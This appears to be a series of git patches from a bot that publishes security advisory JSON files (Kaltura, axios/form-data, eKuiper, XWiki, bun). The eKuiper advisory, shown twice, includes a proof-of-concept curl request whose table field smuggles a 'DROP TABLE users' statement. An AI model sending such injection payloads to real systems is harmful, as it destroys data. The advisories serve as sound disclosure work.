Date: Thu, 24 Jul 2025 00:33:06 +0000 Subject: [PATCH 131/323] Publish GHSA-pmqv-6896-rrvg --- .../GHSA-pmqv-6896-rrvg.json | 48 +++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-pmqv-6896-rrvg/GHSA-pmqv-6896-rrvg.json diff --git a/advisories/unreviewed/2025/07/GHSA-pmqv-6896-rrvg/GHSA-pmqv-6896-rrvg.json b/advisories/unreviewed/2025/07/GHSA-pmqv-6896-rrvg/GHSA-pmqv-6896-rrvg.json new file mode 100644 index 0000000000000..73a6017c3517b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-pmqv-6896-rrvg/GHSA-pmqv-6896-rrvg.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pmqv-6896-rrvg", + "modified": "2025-07-24T00:31:16Z", + "published": "2025-07-24T00:31:16Z", + "aliases": [ + "CVE-2016-15044" + ], + "details": "A remote code execution vulnerability exists in Kaltura versions prior to 11.1.0-2 due to unsafe deserialization of user-controlled data within the keditorservices module. An unauthenticated remote attacker can exploit this issue by sending a specially crafted serialized PHP object in the kdata GET parameter to the redirectWidgetCmd endpoint. Successful exploitation leads to execution of arbitrary PHP code in the context of the web server process.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-15044" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/kaltura_unserialize_rce.rb" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/39563" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/40404" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/kaltura-php-object-injection-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T22:15:24Z" + } +} \ No newline at end of file From 34ceee8da75760676d6ad8d6210b08a0c962baa2 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 24 Jul 2025 12:48:07 +0000 Subject: [PATCH 132/323] Publish GHSA-rrf6-pxg8-684g --- .../2025/07/GHSA-rrf6-pxg8-684g/GHSA-rrf6-pxg8-684g.json | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2025/07/GHSA-rrf6-pxg8-684g/GHSA-rrf6-pxg8-684g.json b/advisories/github-reviewed/2025/07/GHSA-rrf6-pxg8-684g/GHSA-rrf6-pxg8-684g.json index 0b932cbcaab03..8f4dcc4499174 100644 --- a/advisories/github-reviewed/2025/07/GHSA-rrf6-pxg8-684g/GHSA-rrf6-pxg8-684g.json +++ b/advisories/github-reviewed/2025/07/GHSA-rrf6-pxg8-684g/GHSA-rrf6-pxg8-684g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rrf6-pxg8-684g", - "modified": "2025-07-23T15:31:12Z", + "modified": "2025-07-24T12:46:22Z", "published": "2025-07-23T15:31:12Z", "aliases": [ "CVE-2025-54365" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/rennf93/fastapi-guard/security/advisories/GHSA-rrf6-pxg8-684g" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54365" + }, { "type": "WEB", "url": "https://github.com/rennf93/fastapi-guard/commit/0829292c322d33dc14ab00c5451c5c138148035a" @@ -64,6 +68,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2025-07-23T15:31:12Z", - "nvd_published_at": null + "nvd_published_at": "2025-07-23T23:15:24Z" } } \ No newline at end of file From 2af6974c90fa6aeb89da333f5ff1458a45063fef Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 24 Jul 2025 13:37:11 +0000 Subject: [PATCH 133/323] Publish GHSA-rm8p-cx58-hcvx --- .../GHSA-rm8p-cx58-hcvx.json | 21 ++++++++++++++----- 1 file changed, 16 insertions(+), 5 deletions(-) diff --git a/advisories/github-reviewed/2025/07/GHSA-rm8p-cx58-hcvx/GHSA-rm8p-cx58-hcvx.json b/advisories/github-reviewed/2025/07/GHSA-rm8p-cx58-hcvx/GHSA-rm8p-cx58-hcvx.json index 24183bf5ad068..f7fadfb2c4431 100644 --- a/advisories/github-reviewed/2025/07/GHSA-rm8p-cx58-hcvx/GHSA-rm8p-cx58-hcvx.json +++ b/advisories/github-reviewed/2025/07/GHSA-rm8p-cx58-hcvx/GHSA-rm8p-cx58-hcvx.json @@ -1,11 +1,14 @@ { "schema_version": "1.4.0", "id": "GHSA-rm8p-cx58-hcvx", - "modified": "2025-07-23T16:50:13Z", + "modified": "2025-07-24T13:35:30Z", "published": "2025-07-23T16:49:38Z", - "aliases": [], - "summary": "Axios has Transitive Critical Vulnerability via form-data — Predictable Boundary Values (CVE-2025-7783)", - "details": "### Summary\nA critical vulnerability exists in the form-data package used by `axios@1.10.0`. The issue allows an attacker to predict multipart boundary values generated using `Math.random()`, opening the door to HTTP parameter pollution or injection attacks.\n\nThis was submitted in [issue #6969](https://github.com/axios/axios/issues/6969) and addressed in [pull request #6970](https://github.com/axios/axios/pull/6970).\n\n### Details\nThe vulnerable package `form-data@4.0.0` is used by `axios@1.10.0` as a transitive dependency. It uses non-secure, deterministic randomness (`Math.random()`) to generate multipart boundary strings.\n\nThis flaw is tracked under [Snyk Advisory SNYK-JS-FORMDATA-10841150](https://security.snyk.io/vuln/SNYK-JS-FORMDATA-10841150) and [CVE-2025-7783](https://security.snyk.io/vuln/SNYK-JS-FORMDATA-10841150).\n\nAffected `form-data` versions:\n- <2.5.4\n- >=3.0.0 <3.0.4\n- >=4.0.0 <4.0.4\n\nSince `axios@1.10.0` pulls in `form-data@4.0.0`, it is exposed to this issue.\n\n\n### PoC\n1. Install Axios: - `npm install axios@1.10.0`\n2.Run `snyk test`:\n```\nTested 104 dependencies for known issues, found 1 issue, 1 vulnerable path.\n\n✗ Predictable Value Range from Previous Values [Critical Severity]\nin form-data@4.0.0 via axios@1.10.0 > form-data@4.0.0\n\n```\n3. Trigger a multipart/form-data request. Observe the boundary header uses predictable random values, which could be exploited in a targeted environment.\n\n\n### Impact\n\n- **Vulnerability Type**: Predictable Value / HTTP Parameter Pollution\n- **Risk**: Critical (CVSS 9.4)\n- **Impacted Users**: Any application using axios@1.10.0 to submit multipart form-data\n\n\nThis could potentially allow attackers to:\n- Interfere with multipart request parsing\n- Inject unintended parameters\n- Exploit backend deserialization logic depending on content boundaries\n\n### Related Links\n[GitHub Issue #6969](https://github.com/axios/axios/issues/6969)\n\n[Pull Request #xxxx](https://github.com/axios/axios/pull/xxxx) (replace with actual link)\n\n[Snyk Advisory](https://security.snyk.io/vuln/SNYK-JS-FORMDATA-10841150)\n\n[form-data on npm](https://www.npmjs.com/package/form-data)", + "withdrawn": "2025-07-24T13:35:30Z", + "aliases": [ + "CVE-2025-54371" + ], + "summary": "Withdrawn Advisory: Axios has Transitive Critical Vulnerability via form-data", + "details": "### Withdrawn Advisory\nThis advisory has been withdrawn because users of Axios 1.10.0 have the flexibility to use a patched version of form-data, the software in which the vulnerability originates, without upgrading Axios to address GHSA-fjxv-7rqg-78g4.\n\n### Original Description\nA critical vulnerability exists in the form-data package used by `axios@1.10.0`. The issue allows an attacker to predict multipart boundary values generated using `Math.random()`, opening the door to HTTP parameter pollution or injection attacks.\n\nThis was submitted in [issue #6969](https://github.com/axios/axios/issues/6969) and addressed in [pull request #6970](https://github.com/axios/axios/pull/6970).\n\n### Details\nThe vulnerable package `form-data@4.0.0` is used by `axios@1.10.0` as a transitive dependency. It uses non-secure, deterministic randomness (`Math.random()`) to generate multipart boundary strings.\n\nThis flaw is tracked under [Snyk Advisory SNYK-JS-FORMDATA-10841150](https://security.snyk.io/vuln/SNYK-JS-FORMDATA-10841150) and [CVE-2025-7783](https://security.snyk.io/vuln/SNYK-JS-FORMDATA-10841150).\n\nAffected `form-data` versions:\n- <2.5.4\n- >=3.0.0 <3.0.4\n- >=4.0.0 <4.0.4\n\nSince `axios@1.10.0` pulls in `form-data@4.0.0`, it is exposed to this issue.\n\n\n### PoC\n1. Install Axios: - `npm install axios@1.10.0`\n2.Run `snyk test`:\n```\nTested 104 dependencies for known issues, found 1 issue, 1 vulnerable path.\n\n✗ Predictable Value Range from Previous Values [Critical Severity]\nin form-data@4.0.0 via axios@1.10.0 > form-data@4.0.0\n\n```\n3. Trigger a multipart/form-data request. Observe the boundary header uses predictable random values, which could be exploited in a targeted environment.\n\n\n### Impact\n\n- **Vulnerability Type**: Predictable Value / HTTP Parameter Pollution\n- **Risk**: Critical (CVSS 9.4)\n- **Impacted Users**: Any application using axios@1.10.0 to submit multipart form-data\n\n\nThis could potentially allow attackers to:\n- Interfere with multipart request parsing\n- Inject unintended parameters\n- Exploit backend deserialization logic depending on content boundaries\n\n### Related Links\n[GitHub Issue #6969](https://github.com/axios/axios/issues/6969)\n\n[Pull Request #xxxx](https://github.com/axios/axios/pull/xxxx) (replace with actual link)\n\n[Snyk Advisory](https://security.snyk.io/vuln/SNYK-JS-FORMDATA-10841150)\n\n[form-data on npm](https://www.npmjs.com/package/form-data)", "severity": [ { "type": "CVSS_V3", @@ -41,6 +44,10 @@ "type": "WEB", "url": "https://github.com/axios/axios/security/advisories/GHSA-rm8p-cx58-hcvx" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54371" + }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7783" @@ -53,6 +60,10 @@ "type": "WEB", "url": "https://github.com/axios/axios/pull/6970" }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-fjxv-7rqg-78g4" + }, { "type": "PACKAGE", "url": "https://github.com/axios/axios" @@ -67,6 +78,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2025-07-23T16:49:38Z", - "nvd_published_at": null + "nvd_published_at": "2025-07-23T21:15:26Z" } } \ No newline at end of file From bc6fa1ed8034c43b215be055e4f9014f9e085721 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 24 Jul 2025 14:20:57 +0000 Subject: [PATCH 134/323] Publish GHSA-526j-mv3p-f4vv --- .../GHSA-526j-mv3p-f4vv.json | 59 +++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-526j-mv3p-f4vv/GHSA-526j-mv3p-f4vv.json diff --git a/advisories/github-reviewed/2025/07/GHSA-526j-mv3p-f4vv/GHSA-526j-mv3p-f4vv.json b/advisories/github-reviewed/2025/07/GHSA-526j-mv3p-f4vv/GHSA-526j-mv3p-f4vv.json new file mode 100644 index 0000000000000..8f96f9f9145be --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-526j-mv3p-f4vv/GHSA-526j-mv3p-f4vv.json @@ -0,0 +1,59 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-526j-mv3p-f4vv", + "modified": "2025-07-24T14:19:17Z", + "published": "2025-07-24T14:19:17Z", + "aliases": [], + "summary": "eKuiper API endpoints handling SQL queries with user-controlled table names. ", + "details": "### Summary\nA critical SQL Injection vulnerability exists in the `getLast` API functionality of the eKuiper project. This flaw allows unauthenticated remote attackers to execute arbitrary SQL statements on the underlying SQLite database by manipulating the table name input in an API request. Exploitation can lead to data theft, corruption, or deletion, and full database compromise.\n\n\n### Details\nThe root cause lies in the use of unsanitized user-controlled input when constructing SQL queries using `fmt.Sprintf`, without validating the `table` parameter. Specifically, in:\n\n```go\nquery := fmt.Sprintf(\"SELECT * FROM %s ORDER BY rowid DESC LIMIT 1\", table)\n```\nAny value passed as the `table` parameter is directly interpolated into the SQL string, enabling injection attacks. This is reachable via API interfaces that expose time-series queries.\n\n\n### PoC\n1. **Deploy eKuiper instance** (default config is sufficient).\n2. **Send a crafted request to the SQL query endpoint**:\n```bash\n curl -X POST http://localhost:9081/sql-query \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"table\": \"sensors; DROP TABLE users; --\",\n \"operation\": \"getLast\"\n }'\n```\n3. **Effect**: Executes two SQL queries — the first selects data, the second drops the `users` table.\n4. **Verify Result**:\n```bash\n sqlite3 etc/kuiper/data/kuiper.db \".tables\"\n```\n\n### Impact\nCWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')\n\n\n### Refferences\n- https://github.com/lf-edge/ekuiper/commit/72c4918744934deebf04e324ae66933ec089ebd3", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/lf-edge/ekuiper/v2" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/lf-edge/ekuiper/security/advisories/GHSA-526j-mv3p-f4vv" + }, + { + "type": "WEB", + "url": "https://github.com/lf-edge/ekuiper/commit/72c4918744934deebf04e324ae66933ec089ebd3" + }, + { + "type": "PACKAGE", + "url": "https://github.com/lf-edge/ekuiper" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2025-07-24T14:19:17Z", + "nvd_published_at": null + } +} \ No newline at end of file From 6e802f3580cb3721d1719e61fb5051a944030680 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 24 Jul 2025 15:06:13 +0000 Subject: [PATCH 135/323] Publish Advisories GHSA-v9mx-4pqq-h232 GHSA-4j66-8f4r-3pjx --- .../GHSA-v9mx-4pqq-h232.json | 73 ------------------- .../GHSA-4j66-8f4r-3pjx.json | 69 ------------------ 2 files changed, 142 deletions(-) delete mode 100644 advisories/github-reviewed/2024/12/GHSA-v9mx-4pqq-h232/GHSA-v9mx-4pqq-h232.json delete mode 100644 advisories/github-reviewed/2025/07/GHSA-4j66-8f4r-3pjx/GHSA-4j66-8f4r-3pjx.json diff --git a/advisories/github-reviewed/2024/12/GHSA-v9mx-4pqq-h232/GHSA-v9mx-4pqq-h232.json b/advisories/github-reviewed/2024/12/GHSA-v9mx-4pqq-h232/GHSA-v9mx-4pqq-h232.json deleted file mode 100644 index f5e61468cd645..0000000000000 --- a/advisories/github-reviewed/2024/12/GHSA-v9mx-4pqq-h232/GHSA-v9mx-4pqq-h232.json +++ /dev/null @@ -1,73 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-v9mx-4pqq-h232", - "modified": "2024-12-18T16:56:06Z", - "published": "2024-12-18T06:30:49Z", - "aliases": [ - "CVE-2024-21548" - ], - "summary": "Bun has an Application-level Prototype Pollution vulnerability in the runtime native API for Glo", - "details": "Versions of the package bun before 1.1.30 are vulnerable to Prototype Pollution due to improper input sanitization. An attacker can exploit this vulnerability through Bun's APIs that accept objects.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" - }, - { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" - } - ], - "affected": [ - { - "package": { - "ecosystem": "npm", - "name": "bun" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "1.1.30" - } - ] - } - ] - } - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21548" - }, - { - "type": "WEB", - "url": "https://github.com/oven-sh/bun/pull/14119" - }, - { - "type": "WEB", - "url": "https://github.com/oven-sh/bun/commit/a234e067a5dc7837602df3fb5489e826920cc65a" - }, - { - "type": "PACKAGE", - "url": "https://github.com/oven-sh/bun" - }, - { - "type": "WEB", - "url": "https://security.snyk.io/vuln/SNYK-JS-BUN-8499549" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-1321" - ], - "severity": "MODERATE", - "github_reviewed": true, - "github_reviewed_at": "2024-12-18T16:56:06Z", - "nvd_published_at": "2024-12-18T06:15:23Z" - } -} \ No newline at end of file diff --git a/advisories/github-reviewed/2025/07/GHSA-4j66-8f4r-3pjx/GHSA-4j66-8f4r-3pjx.json b/advisories/github-reviewed/2025/07/GHSA-4j66-8f4r-3pjx/GHSA-4j66-8f4r-3pjx.json deleted file mode 100644 index cc70cd962bccb..0000000000000 --- a/advisories/github-reviewed/2025/07/GHSA-4j66-8f4r-3pjx/GHSA-4j66-8f4r-3pjx.json +++ /dev/null @@ -1,69 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-4j66-8f4r-3pjx", - "modified": "2025-07-23T16:38:39Z", - "published": "2025-07-23T06:33:50Z", - "aliases": [ - "CVE-2025-8022" - ], - "summary": "bun vulnerable to OS Command Injection", - "details": "All versions of the package bun are vulnerable to Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in the $ shell API due to improper neutralization of user input. An attacker can exploit this by providing specially crafted input that includes command-line arguments or shell metacharacters, leading to unintended command execution.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" - }, - { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" - } - ], - "affected": [ - { - "package": { - "ecosystem": "npm", - "name": "bun" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "last_affected": "1.1.39" - } - ] - } - ] - } - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8022" - }, - { - "type": "WEB", - "url": "https://gist.github.com/lirantal/9780d664037f29d5277d7b2bc569d213" - }, - { - "type": "PACKAGE", - "url": "https://github.com/oven-sh/bun" - }, - { - "type": "WEB", - "url": "https://security.snyk.io/vuln/SNYK-JS-BUN-9510752" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-78" - ], - "severity": "HIGH", - "github_reviewed": true, - "github_reviewed_at": "2025-07-23T16:38:39Z", - "nvd_published_at": "2025-07-23T05:15:30Z" - } -} \ No newline at end of file From e5e509ba326ae4cfed33110fa6c4fae02f638b58 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 24 Jul 2025 17:37:51 +0000 Subject: [PATCH 136/323] Publish GHSA-526j-mv3p-f4vv --- .../2025/07/GHSA-526j-mv3p-f4vv/GHSA-526j-mv3p-f4vv.json | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/advisories/github-reviewed/2025/07/GHSA-526j-mv3p-f4vv/GHSA-526j-mv3p-f4vv.json b/advisories/github-reviewed/2025/07/GHSA-526j-mv3p-f4vv/GHSA-526j-mv3p-f4vv.json index 8f96f9f9145be..f154dfd42252e 100644 --- a/advisories/github-reviewed/2025/07/GHSA-526j-mv3p-f4vv/GHSA-526j-mv3p-f4vv.json +++ b/advisories/github-reviewed/2025/07/GHSA-526j-mv3p-f4vv/GHSA-526j-mv3p-f4vv.json @@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-526j-mv3p-f4vv", - "modified": "2025-07-24T14:19:17Z", + "modified": "2025-07-24T17:35:59Z", "published": "2025-07-24T14:19:17Z", - "aliases": [], + "aliases": [ + "CVE-2025-54379" + ], "summary": "eKuiper API endpoints handling SQL queries with user-controlled table names. ", "details": "### Summary\nA critical SQL Injection vulnerability exists in the `getLast` API functionality of the eKuiper project. This flaw allows unauthenticated remote attackers to execute arbitrary SQL statements on the underlying SQLite database by manipulating the table name input in an API request. Exploitation can lead to data theft, corruption, or deletion, and full database compromise.\n\n\n### Details\nThe root cause lies in the use of unsanitized user-controlled input when constructing SQL queries using `fmt.Sprintf`, without validating the `table` parameter. Specifically, in:\n\n```go\nquery := fmt.Sprintf(\"SELECT * FROM %s ORDER BY rowid DESC LIMIT 1\", table)\n```\nAny value passed as the `table` parameter is directly interpolated into the SQL string, enabling injection attacks. This is reachable via API interfaces that expose time-series queries.\n\n\n### PoC\n1. **Deploy eKuiper instance** (default config is sufficient).\n2. **Send a crafted request to the SQL query endpoint**:\n```bash\n curl -X POST http://localhost:9081/sql-query \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"table\": \"sensors; DROP TABLE users; --\",\n \"operation\": \"getLast\"\n }'\n```\n3. **Effect**: Executes two SQL queries — the first selects data, the second drops the `users` table.\n4. **Verify Result**:\n```bash\n sqlite3 etc/kuiper/data/kuiper.db \".tables\"\n```\n\n### Impact\nCWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')\n\n\n### Refferences\n- https://github.com/lf-edge/ekuiper/commit/72c4918744934deebf04e324ae66933ec089ebd3", "severity": [ From c4552bac80738374d9c1bdc3ed53c6c718ee3479 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 24 Jul 2025 18:10:42 +0000 Subject: [PATCH 137/323] Publish GHSA-vr59-gm53-v7cq --- .../GHSA-vr59-gm53-v7cq.json | 80 +++++++++++++++++++ 1 file changed, 80 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-vr59-gm53-v7cq/GHSA-vr59-gm53-v7cq.json diff --git a/advisories/github-reviewed/2025/07/GHSA-vr59-gm53-v7cq/GHSA-vr59-gm53-v7cq.json b/advisories/github-reviewed/2025/07/GHSA-vr59-gm53-v7cq/GHSA-vr59-gm53-v7cq.json new file mode 100644 index 0000000000000..7f9ed237c422d --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-vr59-gm53-v7cq/GHSA-vr59-gm53-v7cq.json @@ -0,0 +1,80 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vr59-gm53-v7cq", + "modified": "2025-07-24T18:09:02Z", + "published": "2025-07-24T18:09:01Z", + "aliases": [ + "CVE-2025-32429" + ], + "summary": "XWiki Platform vulnerable to SQL injection through getdeleteddocuments.vm template sort parameter", + "details": "### Impact\n\nIt's possible for anyone to inject SQL using the parameter sort of the `getdeleteddocuments.vm`. It's injected as is as an ORDER BY value.\n\nOne can see the result of the injection with http://127.0.0.1:8080/xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=injected (this example does not work, but it shows that an HQL query was executed with the passed value which look nothing like an order by value, without any kind of sanitation).\n\n### Patches\n\nThis has been patched in 17.3.0-rc-1, 16.10.6.\n\n### Workarounds\n\nThere is no known workaround, other than upgrading XWiki.\n\n### References\n\nhttps://jira.xwiki.org/browse/XWIKI-23093\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)\n* Email us at [Security Mailing List](mailto:security@xwiki.org)\n\n### Attribution\n\nThe vulnerability was identifier by Aleksey Solovev from Positive Technologies.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.xwiki.platform:xwiki-platform-distribution-war" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.4-rc-1" + }, + { + "fixed": "16.10.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.xwiki.platform:xwiki-platform-distribution-war" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "17.0.0-rc-1" + }, + { + "fixed": "17.3.0-rc-1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-vr59-gm53-v7cq" + }, + { + "type": "PACKAGE", + "url": "https://github.com/xwiki/xwiki-platform" + }, + { + "type": "WEB", + "url": "https://jira.xwiki.org/browse/XWIKI-23093" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2025-07-24T18:09:01Z", + "nvd_published_at": null + } +} \ No newline at end of file From b37cd716f180697af81433f2e3996fd6cebac29f Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 24 Jul 2025 18:35:09 +0000 Subject: [PATCH 138/323] Publish Advisories GHSA-9f2r-228g-m882 GHSA-54gx-9g28-h45h GHSA-jj7q-23xp-h55w GHSA-8836-mwr2-27hr GHSA-gvx5-h8g7-3fhv GHSA-rf6v-wqgm-f86h GHSA-368c-2fxg-w24f GHSA-4c85-w99g-9v4w GHSA-7qv6-qqv7-4w43 GHSA-8fxc-vw38-fhp2 GHSA-c3rq-2h7j-m68m GHSA-f734-p3hx-8cw4 GHSA-f945-59hq-g56j GHSA-jxf5-j9w5-328x GHSA-m4mv-3rr9-5v5x GHSA-mpm9-743p-4mm9 GHSA-pj98-r854-3m4h GHSA-q8hh-q8j4-4vqq GHSA-r8qx-fh67-vh4r GHSA-rh7r-mcgw-hv69 --- .../GHSA-9f2r-228g-m882.json | 6 +++- .../GHSA-54gx-9g28-h45h.json | 4 +-- .../GHSA-jj7q-23xp-h55w.json | 4 ++- .../GHSA-8836-mwr2-27hr.json | 6 +++- .../GHSA-gvx5-h8g7-3fhv.json | 6 +++- .../GHSA-rf6v-wqgm-f86h.json | 6 +++- .../GHSA-368c-2fxg-w24f.json | 36 +++++++++++++++++++ .../GHSA-4c85-w99g-9v4w.json | 36 +++++++++++++++++++ .../GHSA-7qv6-qqv7-4w43.json | 36 +++++++++++++++++++ .../GHSA-8fxc-vw38-fhp2.json | 36 +++++++++++++++++++ .../GHSA-c3rq-2h7j-m68m.json | 36 +++++++++++++++++++ .../GHSA-f734-p3hx-8cw4.json | 6 +++- .../GHSA-f945-59hq-g56j.json | 36 +++++++++++++++++++ .../GHSA-jxf5-j9w5-328x.json | 6 +++- .../GHSA-m4mv-3rr9-5v5x.json | 33 +++++++++++++++++ .../GHSA-mpm9-743p-4mm9.json | 36 +++++++++++++++++++ .../GHSA-pj98-r854-3m4h.json | 36 +++++++++++++++++++ .../GHSA-q8hh-q8j4-4vqq.json | 36 +++++++++++++++++++ .../GHSA-r8qx-fh67-vh4r.json | 36 +++++++++++++++++++ .../GHSA-rh7r-mcgw-hv69.json | 36 +++++++++++++++++++ 20 files changed, 464 insertions(+), 9 deletions(-) create mode 100644 advisories/unreviewed/2025/07/GHSA-368c-2fxg-w24f/GHSA-368c-2fxg-w24f.json create mode 100644 advisories/unreviewed/2025/07/GHSA-4c85-w99g-9v4w/GHSA-4c85-w99g-9v4w.json create mode 100644 advisories/unreviewed/2025/07/GHSA-7qv6-qqv7-4w43/GHSA-7qv6-qqv7-4w43.json create mode 100644 advisories/unreviewed/2025/07/GHSA-8fxc-vw38-fhp2/GHSA-8fxc-vw38-fhp2.json create mode 100644 advisories/unreviewed/2025/07/GHSA-c3rq-2h7j-m68m/GHSA-c3rq-2h7j-m68m.json create mode 100644 advisories/unreviewed/2025/07/GHSA-f945-59hq-g56j/GHSA-f945-59hq-g56j.json create mode 100644 advisories/unreviewed/2025/07/GHSA-m4mv-3rr9-5v5x/GHSA-m4mv-3rr9-5v5x.json create mode 100644 advisories/unreviewed/2025/07/GHSA-mpm9-743p-4mm9/GHSA-mpm9-743p-4mm9.json create mode 100644 advisories/unreviewed/2025/07/GHSA-pj98-r854-3m4h/GHSA-pj98-r854-3m4h.json create mode 100644 advisories/unreviewed/2025/07/GHSA-q8hh-q8j4-4vqq/GHSA-q8hh-q8j4-4vqq.json create mode 100644 advisories/unreviewed/2025/07/GHSA-r8qx-fh67-vh4r/GHSA-r8qx-fh67-vh4r.json create mode 100644 advisories/unreviewed/2025/07/GHSA-rh7r-mcgw-hv69/GHSA-rh7r-mcgw-hv69.json diff --git a/advisories/unreviewed/2022/05/GHSA-9f2r-228g-m882/GHSA-9f2r-228g-m882.json b/advisories/unreviewed/2022/05/GHSA-9f2r-228g-m882/GHSA-9f2r-228g-m882.json index 80804ce228257..418ca9aa7be78 100644 --- a/advisories/unreviewed/2022/05/GHSA-9f2r-228g-m882/GHSA-9f2r-228g-m882.json +++ b/advisories/unreviewed/2022/05/GHSA-9f2r-228g-m882/GHSA-9f2r-228g-m882.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9f2r-228g-m882", - "modified": "2024-04-04T00:26:36Z", + "modified": "2025-07-24T18:33:16Z", "published": "2022-05-24T16:45:05Z", "aliases": [ "CVE-2019-11687" @@ -35,6 +35,10 @@ "type": "WEB", "url": 